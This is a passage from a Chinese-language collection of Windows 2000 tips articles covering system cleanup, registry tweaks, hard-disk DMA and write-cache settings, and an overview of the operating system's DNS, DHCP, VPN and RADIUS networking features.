[/purgecache] [/cachesize=x] [/quiet]
    /SCANNOW：立即扫描所有设置保护的系统文件。
    /SCANONCE：下次开机时，只扫描一次所有设置保护的系统文件。
    /SCANBOOT：每次启动时，扫描所有设置保护的系统文件。
    /CANCEL：取消所有搁置中的设置保护系统文件的扫描。
    /QUIET：不提示用户，直接取代所有不正确的文件版本。
    /ENABLE：启用Windows文件保护，方便一般操作。
    /PURGECACHE：删除文件缓存，并立即扫描所有设有保护的文件系统。
    /CACHESIZE=x：设定文件缓存大小。

返回


Windows2000实用技巧

《一键清理系统垃圾》

Windows2000实用技巧

    在进行以下操作之前，首先以“Administrator”的身份，即系统管理员的身份，登陆进入Windows 2000操作系统。
    一、如何减少磁盘空间的浪费
    在Windows 2000操作系统运行过程中，常常会产生后缀名诸如tmp、bak、log、old、txt 等的文件，这些文件其实都是可以进行安全删除的，甚至包括 WINNT 目录下面的bmp文件，如果你不喜欢Windows 2000中自带的那些墙纸的话。完全可以删除这些文件。
    在Windows 2000操作系统WINNT\temp目录下面的文件，笔者也建议你删除掉，那些都是在安装应用软件的过程中遗留下的多余文件。还有一点，就是在硬盘中的小文件，请尽可能地把它们集中起来，然后用WinZip这样的压缩软件合并成一个大文件，从而达到减少磁盘空间浪费的目的。
    二、处理操作系统安全日志装满时的情况
    1.首先打开事件查看器。单击“开始”→“设置”，然后请你单击“控制面板”，双击“管理工具”，然后再双击“事件查看器”即可。
    2.在随后出现的控制台树中，用右键单击“安全日志”，然后单击“属性”。
    3.接着在“常规”选项卡上，单击“改写久于 n 天的事件”或“不改写事件（手动清除日志）”。
    4.接下来点击“开始”→“运行”，再键入 regedit命令，按确定后打开注册表编辑器，找到HKEY_LOCAL_MACHINE\SYSTEM \CurrentControlSet\Control\Lsa分支，这时用右键点击“CrashOnAuditFail”，选择创建“REG_DWORD”类型，赋值为1即可。
    5.此后，需要重新启动你的计算机。
    特别要提醒你的是:
    ①在结束此过程之后，当安全日志装满时，Windows 2000 将停止响应并显示“审核失败”的消息；当 Windows 2000 停止时，若要进行恢复，必须清除安全日志。
    ②如果 Windows 2000 由于安全日志已满而暂停，则必须重新启动系统，如果将来需要用装满的日志停机，则必须重复该过程。
    ③错误地编辑注册表可能会严重损坏系统，更改注册表之前，至少应该备份计算机上所有有用的数据和当前注册表。
    ④你必须作为管理员或管理组成员登录，只有这样才能完成该过程。
    三、加快启动和减少故障恢复时间
    用户完全可以减少Windows 2000操作系统启动的时候显示操作系统列表的时间，如果你是一个忠实的Windows 2000操作系统的使用者，笔者建议你完全可以把启动等待时间设置为5秒。如果你不是网络系统管理员，那你完全可以去掉上面的“将事件写入系统日志”和“发出管理警报”这两个选项，并将“写入调试信息”设置为“无”。试试吧！很灵的。
    四、自动关闭停止响应的程序
    在Windows 2000操作系统中，这个设置可以使系统自动关闭停止响应的程序，而不需要进行麻烦的手工干预。想要实现这个功能，就请点击“开始”→“运行”按照前面的方法打开注册表编辑器，找到HKEY_CURRENT_USER\Control\PanelDesktop分支，将 AutoEndTasks的键值设置为1即可。
    五、移除 POSIX 支持
    大家知道，POSIX（便携式计算机环境操作系统接口）界面被用来对IEEE接口进行支持，如果没有任何设备使用IEEE接口，完全可以将它移出你的系统。请将电脑中WINNT\system32 目录中的OS2.exe、OS2SS.exe、PSXSS.EXE、POSIX.exe重命名为OS2.xxx、OS2SS.xxx、PSXSS.xxx、POSIX.xxx，这样即可移除 POSIX 支持。
    六、帮你在Windows 2000 停止时恢复
    1.首先重新启动计算机并用系统管理员组中的账户登录。
    2.打开“事件查看器”，存档目前记录的安全事件（如果需要的话），然后从安全日志中清除全部事件。
    3.打开注册表编辑器后找到以下注册表项：
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa，右键点击Lsa，从弹出的菜单中选择创建“REG_DWORD”型，赋值为1，删除并替换CrashOnAuditFail 键即可。
    4.重新启动计算机。
    特别要提醒你的是：
    ①如果以前曾经用 CrashOnAuditFail = 1来配置你的系统注册表，并且安全日志已满时，Windows 2000 将停止响应并显示“审核失败”的消息。如果发生这种情况，请按照上面的步骤来操作。
    ②请在备份过程中注意捕获注册表变化，以确保运行备份程序时在备份集中包含系统状态数据的完好无损。
    七、设置硬盘工作模式
    现在电脑爱好者们所用的硬盘要比过去大得多，动辄10G、20G的。就本人所知：大硬盘一般都支持DMA工作模式，如果确定你的硬盘支持DMA方式，那么你就可以用DMA方式代替传统的PIO方式，这样可以提高硬盘的传输速度并减少你的CPU占用率，以提高你的系统性能。具体做法是：用右键点击“我的电脑” →“管理” →“设备管理器” →“IDE ATA/ATAPI控制器” →“Primary IDE Channel” →“属性” →“高级设置”，在传输模式中选择“DMA”即可（在可用的情况下）。
    八、鼠标的优化
    告诉大家一个好消息：在Windows 2000中允许用户对鼠标的采样速率进行设定，以便使鼠标更精确地移动和定位。具体的做法是：点击“开始” →“控制面板” →“鼠标” →“硬件” →“属性”，选择“高级设置”。将鼠标的采样速率设置为100Hz，输入缓冲区长度设置为300Hz，然后点击确定。如果在设置后系统变得不稳定，那就改变采样速率，设置成80Hz或以下即可。试试吧！效果不错的。
    九、加速菜单显示
    大家知道，Windows 2000的默认菜单显示是“淡入淡出”的效果，挺新颖的！但是在这种效果下，修改菜单的显示速度并不明显。那么该怎么样修改呢？请跟我来：
    1.在桌面上单击右键，选择“属性”，此时将弹出“显示属性”窗口，然后在“效果”标签下将“动画显示菜单和工具提示”右边的“淡入淡出效果”改为“滚动效果”。
    2.接下来打开注册表编辑器，找到HKEY_CURRENT_USER\Control Panel\Desktop分支，在右边窗口双击键值名MenuShowDelay的项，这一项的取值范围是0～100000（单位为毫秒），接下来将默认的值改为0或者是400即可。


Windows2000网络新功能

《一键清理系统垃圾》

Windows2000网络新功能

    Windows2000作为Microsoft最新一代网络操作系统，为用户提供了一套完整而强大的网络解决方案。早期Windows NT4.0提供的网络功能，根据技术本身的发展而在Windows2000中得到相应改进；同时，Windows2000还吸收容纳了近年来出现的几乎所有的网络最新技术成果。RADIUS，VPN，IPSec，OSPF等在Windows2000中均提供了对应的实现方法。应用Windows2000，用户可以根据业务需要构建各种功能强大的Intranet/Internet商务解决方案。本文摘要讲述Windows2000对DNS、DHCP、RRAS、VPN和RADIUS等一系列重要网络功能的最新支持。

    一、DNS:
    Windows2000采用DNS作为网络操作系统中的名称服务，Windows2000中的DNS以IETF为基础，与RFC兼容，可以与所有符合RFC标准的DNS共存。Microsoft DNS在Windows2000网络体系中不是唯一的选择，只要支持动态更新和SRV资源定位记录的RFC兼容DNS均可做Windows2000的名称解析服务。然而，由于Windows2000所带的DNS可以与Windows2000的ADS集成，提供了更多的功能。因而将Windows2000的DNS应用于Windows2000或其他网络操作系统中是一种最理想的网络名称解析解决方案。
    Windows2000 DNS提供动态与静态两种主机名称解析方式，两种方式之间可以自由转换。静态主机名解析是一种传统的主机名解析方式，它将大量主机名与IP地址的对应关系存放在一个特定的数据库中，缺点是无论主机名或IP地址有任何变化均需要由管理员对数据库进行更新，产生较大的管理负荷。基于RFC2136的动态DNS根据IP地址或主机名的变化，自动在对应数据库中做出更改，减少了中型或中大型网络的管理负担。客户端在初始化时首先查询DNS服务器以确认本身记录存在于DNS服务器数据库中，如果查询不能发现对应记录，则向 Primary DNS发送注册请求，DNS收到注册请求后在保证记录不冲突的前提下添加此项纪录，如果记录有冲突，注册请求失败，DNS客户端转向第二个Primary DNS注册。向DNS的注册过程由DHCP Client服务完成，可以提供给DHCP客户端用户，有确定IP地址的非DHCP客户端和RAS用户。
    Windows2000的DNS与ADS的紧密结合为DNS增添了许多新的特性和功能。Windows2000的ADS是一个面向对象的X.500兼容的数据库，将所有的网络资源组织在一个树状结构体系中。ADS数据库中所有对象以容器或叶子的形式存在，DNS与ADS集成后所有DNS数据加入ADS数据库中，DNS的原有Zone变成ADS中的容器，而原DNS的记录变成ADS中具有多个属性值的对象。在ADS集成环境下不存在单独的DNS数据库。Windows2000 ADS采用多主复制，所有ADS数据存放在多个DC中，Windows2000通过系列方法避免数据复制过程中的冲突，DNS与ADS集成后不同DNS中的记录与ADS依照多主复制形式进行。多主复制减少了首要服务器上的负载，在中大型网络中性能优势非常明显。
    在数据复制方面，Windows2000 DNS应用增量区域复制（IXFR）取代完全区域复制（AXFR），从而减少区域复制所产生的数据通讯；应用Unicode Character取代标准的ASCII命名体系，使NETBIOS与DNS名称之间能够实现方便的转换；应用Domain Locator功能使Windows2000及其先前产品均能够查找DC实现登录。

    二、DHCP:
    DHCP是在IETF RFC中定义的一套动态分配IP 地址的开放标准。应用DHCP服务，管理员不必再为每一台计算机手工分配IP地址，可以实现IP地址的动态集中分配和管理。Windows2000　Server针对传统DHCP功能的局限做了一些新的扩展。
    Windows2000中实现了DHCP与DNS结合。由于在Windows2000中DNS数据可以动态更新，配合DHCP对IP地址的动态分配，使从主机名解析到IP地址分配均可以通过Windows2000　Server集中配置完成。DHCP与 DNS的集成方案在业界还没有最终的确定标准，在RFC中尚属Draft一级，但这不妨碍Microsoft将其作为一个可选功能加入Windows2000中所给用户提供的方便。
    先前传统的DHCP一直存在一个由于多个DHCP　Server存在而产生的IP地址冲突问题。网络合法的DHCP　IP地址分配有专门管理员负责，管理规范可以避免冲突，但如果存在非法的DHCP　Server，IP地址一旦冲突，会给网络正常应用带来很大的麻烦。Windows2000增加了DHCP的注册功能，Windows2000中DHCP Server只有在ADS中注册以后才开始响应客户端的IP地址请求，而注册需要得到DS的验证。这个过程只有在Windows2000网络体系中才能够完成。
    DHCP在Windows2000中可以进行实时监测，如可以设置当IP资源剩余10%时报警，IP资源耗尽时报警等监测方法。此外，利用Windows2000的Cluster功能，DHCP可以在两台Cluster机器上面使用同一套 IP地址工作。正常情况下只有一台机器响应客户端的IP请求，当Cluster机器中有一台出现问题时，另一台在很短时间内开始工作，这个过程对用户是透明的。Windows2000中DHCP还可以分配Multicast地址范围，响应Multicast的地址请求。

    三、RRAS:
    Windows2000的RRAS为远程拨号客户端提供了一个可以应用TCP/IP、NETBEUI、IPX/SPX等多种网络传输协议，通过PSTN、ISDN、ATM和VPN等多种途径访问企业网络的安全途径。
    PSTN、ISDN 在Windows NT4.0已得到较好的支持，Windows2000在易用性方面有进一步的发展，如提供Connection Manager Administration Kit，简化了客户端配置，集中管理客户端的拨号属性、图形界面，并可以向客户端发布更新地址簿信息。
    ATM （Asynchronous Transfer Mode）提供了一种可以在多种媒质中使用的高速传输技术，这一技术综合了一系列复杂的标准。由于成本高、技术复杂而且与传统的LAN兼容方面的一些问题，ATM在实际应用曾经碰到了一定阻力。ATM作为主干的网络方案很多，而分支网络大多仍然沿用传统的LAN网络。另外，将ATM作为网络的一部分单独引入的例子也有很多。近来随着ATM技术的普及，ATM的实施成本也在降低，一些完全采用ATM的方案不断出现。Microsoft在早期的Windows产品，如Windows 95,Windows NT4.0中对ATM都有一定程度的支持，而在Windows2000中加入了更高级别的支持。在Windows2000中新引入的NDIS5.0，是一种面向连接的网络驱动接口标准。Microsoft在Windows2000中加入了LANE client, IP/ATM components, PPP/ATM components, a Windows Sockets Service Provider, and UNI signaling modules for end stations等一系列功能模块，用户通过这些接口可以直接访问ATM服务，而硬件生产厂商在这些接口基础上做较少的开发就可以生产不同硬件的驱动程序。
    在Windows2000中RRAS的一个突出特点是与Routing技术紧密结合，系统中的配置也在一个共同的管理界面进行。针对Routing方面，Windows2000提供了较大的改进。在早期的NT版本中动态和静态路由表技术虽然得到支持，但动态路由表使用RIP协议。在Windows2000中开始支持OSPF协议。RIP是一种经典的动态路由信息协议，配置简单，适合于中小型网络，缺点是通过固定时间间隔的广播与周围路由器交换路由信息，造成较大的网络负载。而OSPF是近年来发展起来的新一代动态路由信息协议，与简单交换路由信息不同，OSPF通过向临近的路由器发送连接坐标信息并且改变连接状态数据库的方式对路由信息进行动态刷新，减少了网络通讯，是一种小型到大型网络中均可以使用的动态路由信息协议。Windows2000对OSPF的支持使Windows2000能够作为路由器在各种规模的网络体系得到应用。

    四、VPN技术：
    VPN应用隧道技术将不直接连接的两个网络通过公共网络连接起来，在数据传输过程中保证数据的安全性。VPN采用的隧道技术将网络发送的数据重新打包然后转发，在转发过程中保证数据的安全。在安全性方面VPN采用PPTP与L2TP两种协议，PPTP加密VPN隧道两端之间的数据传输，而L2TP采用端对端加密，能够保证数据在服务器与客户端之间进行传输时均处于加密状态。根据实际通讯方式不同，VPN分为Voluntary Tunneling和Compulsory Tunneling两种，前者在访问客户端与被访问的服务器之间建立VPN通道，而后者在两台中介服务器之间建立VPN连接，通讯的客户端与服务器通过已建立的固定VPN通道进行数据交换。两种角色Windows2000 Server均可充当。
    L2TP是一种比PPTP先进的协议，它可以支持多种传输媒介，如ATM、X.25和Frame Relay等，而PPTP只支持IP协议下的Internet/Intranet连接。L2TP支持多Tunnel技术，PPTP只支持一个Tunnel。Windows2000支持PPTP和L2TP两种协议，为用户在设置VPN过程中提供了一种更先进的选择。
    针对数据在传输中的安全性，Windows2000在VPN中采用IPSec数据加密技术，IPSec是一种Draft级别的RFC标准，是原有安全性基础上的一个重要补充。它处于TCP/IP协议下层，首先验证访问请求者的IP地址和端口地址的合法性，过滤掉不合法的请求，同时在访问双方之间建立安全会话，并对传输的数据进行加密。IPSec的一切功能对使用者是透明的。

    五、RADIUS技术：
    RADIUS（Remote Authentication Dial-in User Service）是一个在拨号网络中提供注册、验证功能的工业标准。早期的Windows NT网络只能进行NT账号的验证，随着网络规模的扩大，Windows2000需要与多种网络客户端和服务器进行通讯，这就要求作为核心服务器的Windows2000必须能够识别来自不同系统的多种验证加密方法，对不同系统的验证请求统一记录安全日志。Windows2000提供的RADIUS服务可以满足上述要求。
    Windows2000的RADIUS服务与RRAS结合可以集中管理远程访问策略，同时集中记录RADIUS访问及Windows2000访问日志。此外，Windows2000还提供了将RADIUS与ADS集成的方法，使RADIUS访问策略存在于ADS数据库中，并与ADS数据库进行同步数据复制。

    Windows2000作为当前网络体系最先进的网络操作系统之一，继承了大量最新的网络技术。与Windows2000本身强大的管理功能结合，为用户提供了一个从小型到大型甚至超大型网络的优秀解决方案。整个网络体系不同组件之间紧密结合，继承了Windows体系一贯的方便管理的特点，所有设置均可以在图形化界面下完成，并随机附带了极其丰富的联机帮助文档，大大降低了处理类似方案的技术难度。

返回


Windows2000系统优化指南

《一键清理系统垃圾》

Windows2000系统优化指南

    对很多用户来讲，从 Windows 95升级到Windows 98 是一件容易的事，而且也很快使系统正常高效的运转起来。但当他们从Windows 98再次升级到 Windows 2000的时候，往往得出一个结论：Windows 2000对我来讲太慢了。其实除了硬件方面的原因外，系统设置是导致用户对Windows 2000下如此结论的另外一个原因，本文将向你介绍如何进行Windows 2000的软件系统优化，从而提升系统的整体性能，并达到满意的速度。

  首先要说明一点，以下的优化是对于单机用户来讲的，不涉及到网络方面的优化方法，但以下方法对提高网络用户性能同样有效。我们将在以后的文章中介绍网络的优化方法。

    在进行系统优化设置之前，请以ADMINISTRATOR （系统管理员）的身份登陆进入Windows 2000。

一、删除不需要的文件＋清空回收站

    对于在格式化硬盘以后进行Windows 2000安装的用户可以跳过这一步，这点可能更多针对那些安装Windows 2000已经一段时间的人来讲。

    在系统运行过程中常常会产生诸如*.tmp, *.bak, *.log, *.old, *.txt 的文件，这些文件其实都是可以进行安全删除的，甚至包括 WINNT 目录下面的*.bmp文件－－如果你不喜欢Windows 2000带的那些墙纸的话。在删除这些文件以后，请记住清空回收站。

    在WINNTtemp目录下面的文件也建议你删除掉，那些都是在安装应用软件的过程中留下的。还有一点就是你硬盘中的小文件，进可能把它们集中起来，然后用WINZIP这样的压缩软件合并成一个大文件，减少磁盘空间的浪费。

二、启动和故障恢复

    减小启动的时候显示操作系统列表的时间，如果你一直是使用的Windows 2000，建议把启动等待时间设置为10秒。如果你不是网络系统管理员，可以完全去掉上面的“将事件写入系统日志”和“发出管理警报”这两个选项，并将“写入调试信息”设置为“无”。

三、磁盘检查和磁盘空间整理

    当系统使用一段时间后，会出现一定的文件错误和磁盘碎片，这时候就需要进行磁盘检查和磁盘空间整理。一般来讲应该每隔一周进行一次磁盘检查，每隔一个月进行一次磁盘空间整理。

    在进行磁盘检查和磁盘空间整理的时候，最好关闭所以正在运行的程序。磁盘检查的时候选择上“自动修复文件系统错误”和“扫描并试图恢复坏扇区”。

四、“超频”你的鼠标

    在Windows 2000中允许你对鼠标的采样速率进行设定，以便进行使鼠标更精确的移动和定位。

    要设置鼠标采样速率，点击开始－>控制面板－>鼠标－>硬件－>属性，选择高级设置。将鼠标的采样速率设置为100Hz，输入缓冲区长度设置为300Hz,点击确定。如果在设置后系统变得不稳定，那就改变采样速率，设置成80Hz或以下。

五、移除 POSIX （便携式计算机环境操作系统接口）支持

    POSIX 界面被用来对IEEE接口进行支持，如果你没有任何设备使用IEEE接口，你可以将它移出你的系统。将你电脑中winntsystem32 目录中的OS2.exe, OS2SS.exe, PSXSS.EXE, POSIX.exe 重命名为OS2.xxx, OS2SS.xxx, PSXSS.xxx, POSIX.xxx。

六、设置硬盘工作模式

    除非你使用的是容量在1G以下的硬盘，现在的大硬盘一般都支持DMA工作模式，如果确定你的硬盘支持DMA方式，可以用DMA方式代替传统的PIO方式，这样可以提高硬盘的传输速度并减少CPU占用率。

    右键点击“我的电脑”－>管理－>设备管理器－>IDE ATA/ATAPI控制器－>Primary IDE Channel－>属性－>高级设置，在传输模式中选择“DMA(若可用)”。

七、自动关闭停止响应的程序

    这个设置可以使系统自动关闭停止响应的程序，而无需你进行手工的干预。

    要实现这个功能，需要编辑注册表HKEY_CURRENT_USERControl PanelDesktop 中 AutoEndTasks的键值，将其设置为1。

    通过对以上系统参数的设置，我们可发现Windows 2000的性能有了很大的提升，无论是启动速度还是程序运行的效率都得到大大的提高。所以经常进行系统的维护对使用任何操作系统都是很有帮助的，再经过一定的优化后会大大提升我们的工作效率。

返回


Windows2000硬盘操作小技巧

《一键清理系统垃圾》

Windows2000硬盘操作小技巧

     Windows2000不仅在上网方面、软件使用以及资源优化得到了进一步加强，而且在硬盘管理方面也有了较大的改进。硬盘的性能是系统性能的关键，因而Windows 2000在这方面也作了充分的考虑，提供了足够的优化支持。Windows 2000的硬盘管理比Windows 9x增强了很多，只要适当地使用就可以获得最佳的效果。

     1、正确分析硬盘

     电脑用的时间长了，难免会速度减慢，其中一个原因就是磁盘需要整理一下，但是何时需要整理我们难以确定，Windows2000为您提供了分析工具，让您一看就清楚。在“开始”*“程序”*“附件”*“系统工具”中你可以找到“磁盘整理工具”，但是这个来自于Win98的磁盘整理工具已经和它的前辈有很大的不同，显示的简洁只不过是外在的表现，他能够智能地判断你的磁盘是否需要整理：选中一个磁盘然后单击“分析”，一阵哗啦啦的驱动器响声之后，磁盘整理工具会弹出一个告诉你该磁盘是否需要整理的窗口。

     2、提高硬盘速度

     现在电脑爱好者们所用的硬盘要比过去大得多，动辄10G、20G的。就本人所知：大硬盘一般都支持DMA工作模式，如果确定你的硬盘支持DMA方式，那么你就可以用DMA方式代替传统的PIO方式，这样可以提高硬盘的传输速度并减少你的CPU占用率，以提高你的系统性能。具体做法可按以下步骤操作：用鼠标右键单击“我的电脑”*“管理”*“设备管理器”*“IDE ATA/ATAPI控制器”*“Primary IDE Channel”*“属性”*“高级设置”，在传输模式中请你选择“DMA”即可。

     3、为硬盘减肥

     在你的Windows 2000操作系统运行过程中，常常会产生诸如*.tmp、*.bak、*.log、*.old、*.txt的文件，这些文件其实都是可以安全删除的，如果你不喜欢Windows 2000中自带的那些墙纸的话，还可以把WINNT目录下面的*.bmp文件彻底删除掉。

     在你的Windows 2000操作系统WINNTtemp目录下面的文件，也可以删除掉，那些都是在安装应用软件的过程中遗留下的多余文件。还有一点，就是你硬盘中的小文件，请你尽可能地把它们集中起来，然后用WINZIP这样的压缩软件合并成一个大文件，从而达到减少磁盘空间浪费的目的。

     4、用快速压缩减肥

     您可以通过压缩一些对装载速度要求不高的内容来节省磁盘空间。例如，一些不经常使用的文件或文件夹，或是您不经常使用的程序以及您不准备完全归档的数据等。在资源管理器中，右键单击文件或文件夹并选择“属性”，打开文件属性对话框，在“常规”选项卡中单击“高级”按钮，在打开的“高级属性”对话框中选中“压缩内容以便节省磁盘空间”复选框。

     5、设置硬盘的写入缓存

     Windows 2000可以为硬盘提供写入缓存(Cache)，解决写硬盘这个性能的“瓶颈”问题，加快硬盘的访问速度。打开写入缓存的设置方法是：右键点击桌面上“我的电脑”图标，选择“属性”，接着在弹出窗口中选择“硬件”页签的“设备管理器”，选择“查看”菜单里的“依类型排序设备”，然后展开“Disk Drivers”找到你需要设置的硬盘，然后双击进入其属性设置界面，在“磁盘属性”页签中将“启用了写入缓存”选项选中。按照此方法设置系统中的所有硬盘，确定后重启系统使之生效。这个设置虽然简单，但效果却比较明显，可以有效地增强磁盘和系统性能。

     6、充分管理计算机

     通过单一的桌面工具可以对本地和远端的计算机进行管理。在左边的树型中，提供了系统工具、存储、服务器应用程序和服务三个大类的控制，每大类中又再分为多个子类，这样不断细化之后，提供了对于计算机几乎各方面控制的接口。因此在这里，您能够查看计算机的大部分属性并可以对其进行修改。

     例如，通过“存储”*“磁盘管理”，您可以了解硬盘的主分区、逻辑分区、活动状态等属性和CD-ROM工作情况，进入“系统工具”*“系统信息”选项，又可以对本机中的硬件配置使用情况有个详细的认识。

     现在您再也不用为查找某个信息或使用某个系统功能而穿梭于层层迭迭的菜单和纷繁的图标中了，通过这个集成的管理工具，能够方便地找到您需要的东西。

     7、修复硬盘错误

     利用 Windows 2000 的错误检查工具，可以查找到硬盘上的文件系统错误和坏扇区。方法是，打开“我的电脑”，选择需要检查的本地磁盘。在“文件”菜单上单击属性，然后单击“工具”选项卡。单击“错误检查”下的“开始检查”，并选定“磁盘检查选项”下的“扫描并尝试恢复坏扇区”复选框即可。


Windows2000中的小秘密

《一键清理系统垃圾》

Windows2000中的小秘密

    如何制作启动
    我们前面介绍了你可以直接从光驱启动或者从Windows下安装Windows 2000，可是假如你的BIOS不支持光驱直接启动，而且你想直接安装Windows 2000的（你并不需要安装“瘟酒吧”），难道只有先安装一个Win98才能安装Windows 2000吗？还记得以前WinNT的启动盘的制作？这里我们同样可以制作启动盘，只不过不是用Winnt.exe加上参数来实现，Windows 2000已经将启动盘的制作分离出来，进入Windows 2000光盘上边的BootDisk目录，执行MakeBoot.exe就可以了（可是需要四张盘哟）。

    启动方式的选择

    说Windows 2000是Win98和WinNT的二合一，在这个启动画面上是首先可以体现出来的，在Windows 2000启动之初按下F8键就可以出现这个画面，共有12种启动方式，“安全模式”、“带网络连接的安全模式”、“带命令行的安全模式”是属于原先Win98的，而“启动VGA模式”、“最后一次正确的配置”……是来自于WinNT的，相信不管是用惯Win98还是WinNT的用户都会找到自己熟悉启动方式。

    外观的改变

    桌面上那令人讨厌的活动桌面和频道栏终于被送走了，而且Windows 2000中菜单的弹出是一种真正意义上的淡入淡出，不像Win98的腾一下就弹了出来，如果你仔细看一下，还可以发现鼠标下边还有淡淡的阴影（怪不得Windows 2000的推荐配置比Win98高了一大截，但是有这样的变化可能也是电脑走向生活的一个方面吧）。

    个性化菜单

    使启动菜单适应你工作的方式，显示你最经常使用的应用程序，但是我却很不喜欢微软这个自以为很聪明的小东西，它竟然将很多工具都隐藏起来，虽然我可以通过点击小箭头使它重新显现出来，但是毕竟多了一道手续，怎么办呢？

    打开“开始”/“设置”/“任务栏和开始菜单”，清除掉“常规”选项页中的“使用个性化菜单”的选择就可以了。

    内码转换

    以前你如果需要将台湾的网友发过来的信息存成简体中文的话需要一些专门的类似cbox的工具，在Windows 2000中，cbox已经可以退休了，因为比尔已经将代码转换工具集成了，打开“程序”/“附件”中的代码转化工具，你就可以见到它，该代码转换工具可以将文件在简体和繁体之间快速转换，还可以进行半角和全角的转换，并支持文件和剪贴板的输入，本来该功能在Word 2000中提供，现在则变成了一个系统工具，也算解决了一个小小的难题。

    智能化的磁盘整理工具

    在“开始”/“程序”/“附件”/“系统工具”中你可以找到“磁盘整理工具”的身影，但是这个来自于Win98的磁盘整理工具已经和它的前辈有很大的不同，显示的简洁只不过是外在的表现，他还可以智能的判断你的磁盘是否需要整理：选中一个磁盘然后单击“分析”，一阵哗啦啦的驱动器响声之后，磁盘整理工具会弹出一个告诉你该磁盘是否需要整理的窗口（当然了，是否想整理还要取决于你自己）。

    定制“开始菜单”

    还记得我们在Win98下，为了修改“开始”菜单，你必须学会注册表编辑器或者某些系统增强软件，在Windows 2000中，你不必这样做了：打开“开始”/“设置”/“任务栏和开始菜单”，在“高级”选项页的“开始菜单设置”，你可以选择你想要在“开始”菜单中显示的项目，怎么样？够体贴了吧？！

    Windows 2000多国语言安装

    在Windows 2000中，你再也不必担心你使用的英文Windows 2000输入不了中文，这些都因为Windows 2000支持国际化而且得到了彻底的解决，其实国际化在WinNT设计时就考虑到了，但是直到现在才有了实质性的进展，打开“开始”/“设置”/“控制面板”/“区域选项”，一个画面出现在你的面前，在“你的区域设置（位置）”选择“中文（中国）”，在系统的语言（就是用来设置你的系统可以输入、浏览什么样的文字）设置中，选择“中文（简体）”并且设置为默认值，如果你想可以阅读繁体中文资料就将“中文（繁体）”也一并选上吧，现在你不但可以浏览中文，而且还有中文输入法可用呢……

    网络设置

    在Windows 2000中网络系统被重新设计，你再也不能像以前那样通过右键单击“网上邻居”，然后选择“属性”就可以改变网络类型和你需要配置的协议了。

    如果，你还是像以前那样做，你会得到一个窗口，其中只包含了“新建连接”和“本地连接”两个项目。

    这时点击“新建连接”就进入了我们以前在Win98下面设置“拨号连接”的窗口界面，如果你曾经在Win98下使用过“拨号连接”，这里就不用我多说了。

    “本地连接”主要是关于局域网内部的设置，在其上点击右键选择“属性”进入“本地连接”属性，在这里，你可以配置你的网卡需要配置的协议和各种协议的属性，和WinNT下的局域网设置差不多，相信你自己完全可以搞定，看见下边的“连接后在任务栏中显示图标”没有，如果你选中它，不管你有没有上网，但是只要你在局域网中有信息传输，在任务栏中就会有两个邻接的电脑一闪一闪的，表示有数据传送了……

    真正的“我的文档”

    在Win98中，桌面上有一个图标叫做“我的文档”，它将把你引到Office所存放它的编辑文件的地方。而这个文档目录是对使用这个系统的所有用户都开放的，因为这个目录的路径是固定的。在Windows 2000中有相同的图标，但是它对于“我的文档”进行了一些改变，“我的文档”是真正的个人的文档目录，而不属于其他的人。举个例子说，假设一个Windows 2000的操作系统上同时有几个用户，小李、小王和小赵，那么小李的文档就是他自己的，而小王和小赵是看不到的，对于其他人也是一样。这个文档目录处在Profile目录下，因此也更适合文档在网络中的保密与共享，用户不仅仅可以设置他自己喜欢的Windows界面，也同样适合于用户创建自己的文档。

    查找

    Windows 2000的查找越来越像浏览器页面的查找方式了，不过这种方式虽然使得操作界面变得统一起来，我却不喜欢，不怕大家笑话，我更喜欢以前的查找方式，短小精悍。

    在任意地方进入目录

    在HKEY_CLASSES_ROOTDirectoryshell下新建“项”DOSHere，默认值是“从此进入DOS方式(&D)”（不包括引号，下同）

    在HKEY_CLASSES_ROOTDirectoryshellDOSHere下新建“项”command默认值是“cmd /k cd %1”，现在在任意一个目录上边单击右键，你可以在命令行进入这个目录了。

    在任意磁盘进入DOS

    在HKEY_CLASSES_ROOTDriveshell下边新建“项”DOSHere，默认值是“从此进入DOS方式(&D)”在HKEY_CLASSES_ROOTDriveshellDOSHere下新建“项”command，默认值是“cmd %1”，当然了，上边的两个方法，你只用将“cmd /k cd %1”改成“Explorer %1”，将“cmd %1”改成“Explorer %1”，就可以以图形界面进入了，呵呵……简单吧，不过DOSHere的默认值还是修改一下吧，因为“DOS方式……”不太正确吧。

    以前我们登录WinNT的时候总是需要按下Ctrl+Alt+Delete才能进入密码输入框，可是在Windows 2000中默认是不用按下Ctrl+Alt+Delete就可以登录的，可能你为了安全起见，需要设置成为按下Ctrl+Alt+Delete登录，很简单：打开“控制面板”中的“用户和密码”，在“高级选项”页中，选中“要求用户在登陆之前按Ctrl+Alt+Delete”就可以了（如图10）。

    Crtl＋Alt＋Del

    最直接的方法是使用Crtl＋Alt＋Del键后，在对话框修改（不会重新启动，Windows 2000的按键机制完全不同Win98）。修改，有一个按钮是修改当前用户口令用的。

    其它几个好玩的小东东

    弹子游戏你玩过吗？打开“开始”/“程序”/“附件”/“游戏”中的“桌上弹球”试一次，提醒别让动听的音响效果吓一跳，其难度正适合我们这些菜鸟级的游戏迷。

    辅助工具中的“屏幕键盘”，选中后会运行一个虚拟的键盘，通过鼠标点击可以代替键盘输入，对手有残疾或键盘不熟的人非常的适合。

    整体上来说，Windows 2000确实比他的前辈有了很大的提高，而且这种提高不但从内部（比Windows 98稳定多了）也从外部（比Windows NT 4更好用了）体现出来了，如果你的机器够强劲（推荐配置可能需要PⅡ266级别的电脑，128MB的内存了，不要听微软的推荐，骗你没商量），还是装上这个让我再一次心动的Windows 2000吧！

返回


Windows2000中硬盘操作小技巧

《一键清理系统垃圾》

Windows2000中硬盘操作小技巧

    Windows2000不仅在上网、软件使用以及资源优化上得到了进一步加强，而且在硬盘管理方面也有了较大的改进。
    1.正确分析硬盘
    电脑用的时间长了，难免会速度减慢，其中一个原因就是磁盘“垃圾”太多需要整理一下，步骤如下：在“开始”→“程序”→“附件”→“系统工具”中你可以找到“磁盘整理工具”，选中一个磁盘然后单击“分析”，一阵哗啦啦的驱动器响声之后，磁盘整理工具会弹出一个告诉你该磁盘是否需要整理的窗口，按照提示操作就可以了。
    2.提高硬盘速度
